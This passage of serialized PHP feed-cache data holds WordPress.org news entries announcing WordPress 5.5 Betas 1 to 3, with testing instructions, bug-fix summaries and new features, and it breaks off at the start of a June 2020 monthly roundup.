\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.5 Beta 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Jul 2020 17:51:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8706\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:324:\"WordPress 5.5 Beta 3 is now available! This software is still in development,so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version. You can test WordPress 5.5 Beta 3 in two ways: Try the WordPress Beta Tester plugin (choose the “bleeding [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3876:\"\n<p>WordPress 5.5 Beta 3 is now available!</p>\n\n\n\n<p id=\"block-81bd56b9-ea44-43ad-ab36-a5ae78b54375\"><strong>This software is still in development,</strong>so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p id=\"block-7cc1bbc6-17f9-44c5-8f67-da4e3059ad69\">You can test WordPress 5.5 Beta 3 in two ways:</p>\n\n\n\n<ul id=\"block-4840af57-f44b-4d9f-aa64-c6a452392e42\"><li>Try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (choose the “bleeding edge nightlies” option)</li><li>Or <a href=\"https://wordpress.org/wordpress-5.5-beta3.zip\">download the beta here</a> (zip).</li></ul>\n\n\n\n<p id=\"block-a40528cb-eb3b-4c8a-8f5e-aa700f1ba086\">WordPress 5.5 is slated for release on <a href=\"https://make.wordpress.org/core/5-5/\">August 11th, 2020</a>, and <strong>we need your help to get there</strong>!</p>\n\n\n\n<p>Thank you to all of the contributors who tested the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-2/\">beta 2</a> development release and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress. </p>\n\n\n\n<h2 id=\"block-15d6d57f-905d-4a47-9f66-839468a5375a\">Some highlights</h2>\n\n\n\n<p id=\"block-85da84ec-c841-42f9-8d3b-1a4537a61d10\">Since <a href=\"https://wordpress.org/news/2020/02/wordpress-5-4-beta-2/\">beta 2</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=07%2F15%2F2020..07%2F21%2F2020&amp;milestone=5.5&amp;group=component&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">43 bugs</a> have been fixed. Here are a few changes in beta 3:</p>\n\n\n\n<ul><li>Plugin and theme versions are now shared in the emails when automatically updated (see <a href=\"https://core.trac.wordpress.org/ticket/50350\">#50350</a>).</li><li>REST API routes without a <code>permission_callback</code> now trigger a <code>_doing_it_wrong()</code> warning (see <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://core.trac.wordpress.org/ticket/50075\">#50075</a>).</li><li>Over 23 Gutenberg changes and updates (see <a href=\"https://github.com/WordPress/gutenberg/pull/24068\">#24068</a> and <a href=\"https://core.trac.wordpress.org/ticket/50712\">#50712</a>).</li><li>A bug with the new import and export database Dashicons has been fixed (see <a href=\"https://core.trac.wordpress.org/ticket/49913\">#49913</a>).</li></ul>\n\n\n\n<h2 id=\"block-76156b2b-0a52-4502-b585-6cbe9481f55b\">Developer notes</h2>\n\n\n\n<p id=\"block-3fe5e264-0a95-4f12-9a18-0cb9dc5955d1\">WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> and pay special attention to the <a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developers’ notes</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2 id=\"block-bc89fd56-47b0-439f-8e2c-4a642c80a616\">How to Help</h2>\n\n\n\n<p id=\"block-3ff83a77-8b54-4061-ae2d-45fc984cbd76\">Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev/\">Help translate WordPress into more than 100 languages</a>!</p>\n\n\n\n<p id=\"block-9d871099-ec49-446c-8322-9e49b7498c10\">If you think you’ve found a bug, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. We’d love to hear from you!</p>\n\n\n\n<p id=\"block-bd71c1d3-39d9-4b2a-8193-3486497b45fd\">If you’re comfortable writing a reproducible bug report, <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8706\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.5 Beta 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Jul 2020 17:24:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8681\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:358:\"WordPress 5.5 Beta 2 is now available! This software is still in development,&#160;so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version. You can test WordPress 5.5 beta 2 in two ways: Try the&#160;WordPress Beta Tester&#160;plugin (choose the “bleeding edge nightlies” [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4552:\"\n<p id=\"block-000046ff-d8e6-40a8-9869-2dd39e50f270\"><br>WordPress 5.5 Beta 2 is now available!</p>\n\n\n\n<p id=\"block-81bd56b9-ea44-43ad-ab36-a5ae78b54375\"><strong><strong>This software is still in development,</strong>&nbsp;</strong>so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p id=\"block-7cc1bbc6-17f9-44c5-8f67-da4e3059ad69\">You can test WordPress 5.5 beta 2 in two ways:</p>\n\n\n\n<ul id=\"block-4840af57-f44b-4d9f-aa64-c6a452392e42\"><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-beta2.zip\">download the beta here</a>&nbsp;(zip).</li></ul>\n\n\n\n<p id=\"block-a40528cb-eb3b-4c8a-8f5e-aa700f1ba086\">WordPress 5.5 is slated for release on&nbsp;<a href=\"https://make.wordpress.org/core/5-5/\">August 11th, 2020</a>, and <strong>we need your help to get there</strong>!</p>\n\n\n\n<p>Thank you to all of the contributors that tested the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1/\">beta 1</a> development release and provided feedback. Testing for bugs is an important part of polishing each release and a great way to contribute to WordPress. Here are some of the changes since beta 1 to pay close attention to while testing.</p>\n\n\n\n<h2 id=\"block-15d6d57f-905d-4a47-9f66-839468a5375a\">Some highlights</h2>\n\n\n\n<p id=\"block-85da84ec-c841-42f9-8d3b-1a4537a61d10\">Since <a href=\"https://wordpress.org/news/2020/02/wordpress-5-4-beta-1/\">beta 1</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=07%2F08%2F2020..07%2F14%2F2020&amp;milestone=5.5&amp;group=component&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">48 bugs</a> have been fixed. Here is a summary of a few changes included in beta 2:</p>\n\n\n\n<ul><li>19 additional bugs have been fixed in the block editor (see <a href=\"https://github.com/WordPress/gutenberg/pull/23903\">#23903</a> and <a href=\"https://github.com/WordPress/gutenberg/pull/23905\">#23905</a>).</li><li>The Dashicons icon font has been updated (see <a href=\"https://core.trac.wordpress.org/ticket/49913\">#49913</a>).</li><li>Broken widgets stemming from changes in Beta 1 have been fixed (see <a href=\"https://core.trac.wordpress.org/ticket/50609\">#50609</a>).</li><li>Query handling when counting revisions has been improved (see <a href=\"https://core.trac.wordpress.org/ticket/34560\">#34560</a>).</li><li>An alternate, expanded view was added for <code>wp_list_table</code> (see <a href=\"https://core.trac.wordpress.org/ticket/49715\">#49715</a>).</li><li>Some adjustments were made to the handling of default terms for custom taxonomies (see <a href=\"https://core.trac.wordpress.org/ticket/43517\">#43517</a>)</li></ul>\n\n\n\n<p>Several updates have been made to the block editor. For details, see <a href=\"https://github.com/WordPress/gutenberg/pull/23903\">#23903</a> and <a href=\"https://github.com/WordPress/gutenberg/pull/23905\">#23905</a>.</p>\n\n\n\n<h2 id=\"block-76156b2b-0a52-4502-b585-6cbe9481f55b\">Developer notes</h2>\n\n\n\n<p id=\"block-3fe5e264-0a95-4f12-9a18-0cb9dc5955d1\">WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the&nbsp;<a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a>&nbsp;and pay special attention to the&nbsp;<a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developers’ notes</a>&nbsp;for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2 id=\"block-bc89fd56-47b0-439f-8e2c-4a642c80a616\">How to Help</h2>\n\n\n\n<p id=\"block-3ff83a77-8b54-4061-ae2d-45fc984cbd76\">Do you speak a language other than English?&nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev/\">Help us translate WordPress into more than 100 languages</a>!</p>\n\n\n\n<p id=\"block-9d871099-ec49-446c-8322-9e49b7498c10\">If you think you’ve found a bug, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a>&nbsp;in the support forums. We’d love to hear from you!</p>\n\n\n\n<p id=\"block-bd71c1d3-39d9-4b2a-8193-3486497b45fd\">If you’re comfortable writing a reproducible bug report,&nbsp;<a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>,&nbsp;where you can also find a list of&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8681\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.5 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 07 Jul 2020 21:49:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8624\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:358:\"WordPress 5.5 Beta 1 is now available for testing! This software is still in development,&#160;so it&#8217;s not recommended to run this version on a production site. Consider setting up a test site to play with the new version. You can test the WordPress 5.5 beta in two ways: Try the&#160;WordPress Beta Tester&#160;plugin (choose the “bleeding [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9697:\"\n<p>WordPress 5.5 Beta 1 is now available for testing!</p>\n\n\n\n<p><strong>This software is still in development,</strong>&nbsp;so it&#8217;s not recommended to run this version on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p>You can test the WordPress 5.5 beta in two ways:</p>\n\n\n\n<ul><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-beta1.zip\">download the beta here&nbsp;(zip)</a>.</li></ul>\n\n\n\n<p>The current target for final release is August 11, 2020. This is only <strong>five weeks away</strong>. Your help is needed to ensure this release is tested properly.</p>\n\n\n\n<p>Testing for bugs is an important part of polishing the release during the beta stage and a great way to contribute. Here are some of the big changes and features to pay close attention to while testing.</p>\n\n\n\n<h2><strong>Block editor: features and improvements</strong></h2>\n\n\n\n<p>WordPress 5.5 will include eleven releases of the Gutenberg plugin, bringing with it a long list of exciting new features. Here are just a few:</p>\n\n\n\n<ul><li><strong>Inline image editing &#8211; </strong>Crop, rotate, and zoom photos inline right from image blocks.</li><li><strong>Block patterns</strong> &#8211; Building elaborate pages can be a breeze with new block patterns. Several are included by default.</li><li><strong>Device previews</strong> &#8211; See how your content will look to users on many different screen sizes. </li><li><strong>End block overwhelm</strong>. The new block inserter panel displays streamlined categories and collections. As a bonus, it supports patterns and integrates with the new block directory right out of the box.</li><li><strong>Discover, install, and insert third-party blocks</strong> from your editor using the new block directory.</li><li>A better, <strong>smoother editing experience </strong>with:&nbsp;<ul><li>Refined drag-and-drop</li><li>Block movers that you can see and grab</li><li>Parent block selection</li><li>Contextual focus highlights</li><li>Multi-select formatting lets you change a bunch of blocks at once&nbsp;</li><li>Ability to copy and relocate blocks easily</li><li>And, better performance</li></ul></li><li><strong>An expanded design toolset for themes.</strong></li><li>Now <strong>add backgrounds and gradients</strong> to more kinds of blocks, like groups, columns, media &amp; text</li><li>And <strong>support for more types of measurements</strong> &#8212; not just pixels. Choose ems, rems, percentages, vh, vw, and more! Plus, adjust line heights while typing, turning writing and typesetting into the seamless act.</li></ul>\n\n\n\n<p>In all, WordPress 5.5 brings more than 1,500 useful improvements to the block editor experience.&nbsp;</p>\n\n\n\n<p>To see all of the features for each release in detail check out the release posts: <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v7.5.0\">7.5</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v7.6.0\">7.6</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v7.7.0\">7.7</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v7.8.0\">7.8</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v7.9.0\">7.9</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.0.0\">8.0</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.1.0\">8.1</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.2.0\">8.2</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.3.0\">8.3</a>, <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.4.0\">8.4</a>, and <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v8.5.0\">8.5</a>.</p>\n\n\n\n<h2><strong>Wait! There’s more!</strong></h2>\n\n\n\n<h3><strong>XML sitemaps</strong></h3>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2020/06/10/merge-announcement-extensible-core-sitemaps/\">XML Sitemaps are now included in WordPress</a> and enabled by default. Sitemaps are essential to search engines discovering the content on your website. Your site&#8217;s home page, posts, pages, custom post types, and more will be included to improve your site&#8217;s visibility.</p>\n\n\n\n<h3><strong>Auto-updates for plugins and themes</strong></h3>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/tag/core-auto-updates/\">WordPress 5.5 also brings auto-updates for plugins and themes</a>. Easily control which plugins and themes keep themselves up to date on their own. It&#8217;s always recommended that you run the latest versions of all plugins and themes. The addition of this feature makes that easier than ever!</p>\n\n\n\n<h3><strong>Lazy-loading images</strong></h3>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2020/04/08/lazy-loading-of-images-is-in-core/\">WordPress 5.5 will include native support for lazy-loaded images</a> utilizing new browser standards. With lazy-loading, images will not be sent to users until they approach the viewport. This saves bandwidth for everyone (users, hosts, ISPs), makes it easier for those with slower internet speeds to browse the web, saves electricity, and more.</p>\n\n\n\n<h3><strong>Better accessibility</strong></h3>\n\n\n\n<p>With every release, WordPress works hard to improve accessibility. Version 5.5 is no different and packs a parcel of accessibility fixes and enhancements. Take a look:</p>\n\n\n\n<ul><li>List tables now come with extensive, alternate view modes.</li><li>Link-list widgets can now be converted to HTML5 navigation blocks.</li><li>Copying links in media screens and modal dialogs can now be done with a simple click of a button.</li><li>Disabled buttons now actually look disabled.</li><li>Meta boxes can now be moved with the keyboard.</li><li>A custom logo on the front page no longer links to the front page.</li><li>Assistive devices can now see status messages in the Image Editor.</li><li>The shake animation indicating a login failure now respects the user&#8217;s choices in the <code>prefers-reduced-motion</code> media query.</li><li>Redundant <code>Error:</code> prefixes have been removed from error notices.</li></ul>\n\n\n\n<h2><strong>Miscellaneous Changes</strong></h2>\n\n\n\n<ul><li>Plugins and themes can now be updated by uploading a ZIP file.</li><li><a href=\"https://make.wordpress.org/core/2020/06/26/wordpress-5-5-better-fine-grained-control-of-redirect_guess_404_permalink/\">More finely grained control of redirect_guess_404_permalink()</a>.</li><li><a href=\"https://make.wordpress.org/core/2020/07/01/external-library-updates-in-wordpress-5-5-call-for-testing/\">Several packaged external libraries have been updated</a>, including PHPMailer, SimplePie, Twemoji, Masonry, and more!</li></ul>\n\n\n\n<p>Keep your eyes on the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">5.5-related developer notes</a> in the coming weeks, breaking down these and other changes in greater detail.</p>\n\n\n\n<p>So far, contributors have fixed more than <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=5.5&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">360 tickets in WordPress 5.5</a>, including <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;status=reopened&amp;type=enhancement&amp;milestone=5.5&amp;or&amp;status=closed&amp;status=reopened&amp;type=feature+request&amp;milestone=5.5&amp;col=id&amp;col=summary&amp;col=type&amp;col=status&amp;col=milestone&amp;col=owner&amp;col=priority&amp;col=changetime&amp;col=keywords&amp;order=changetime\">157 new features and enhancements</a>, and more bug fixes are on the way.</p>\n\n\n\n<h2><strong>How You Can Help</strong></h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev/\">Help translate WordPress into more than 100 languages</a>!</p>\n\n\n\n<p>If you think you’ve found a bug, please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. We would love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. That’s also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p class=\"has-small-font-size\"><em>Props to <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>, <a href=\'https://profiles.wordpress.org/yvettesonneveld/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>yvettesonneveld</a>, <a href=\'https://profiles.wordpress.org/estelaris/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>estelaris</a>, and <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> for compiling/writing this post, <a href=\'https://profiles.wordpress.org/davidbaumwald/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>davidbaumwald</a> for editing/proof reading, and <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>, <a href=\'https://profiles.wordpress.org/desrosj/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>desrosj</a>, and <a href=\'https://profiles.wordpress.org/andreamiddleton/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>andreamiddleton</a> for final review.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8624\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:57:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"The Month in WordPress: June 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2020/07/the-month-in-wordpress-june-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Jul 2020 05:52:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8614\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"June was an exciting month for WordPress! Major changes are coming to the Gutenberg plugin, and WordCamp Europe brought the WordPress community closer together. Read on to learn more and to get all the latest updates.&#160; WordPress 5.4.2 released We said hello to WordPress 5.4.2 on June 10. This security and maintenance release features 17 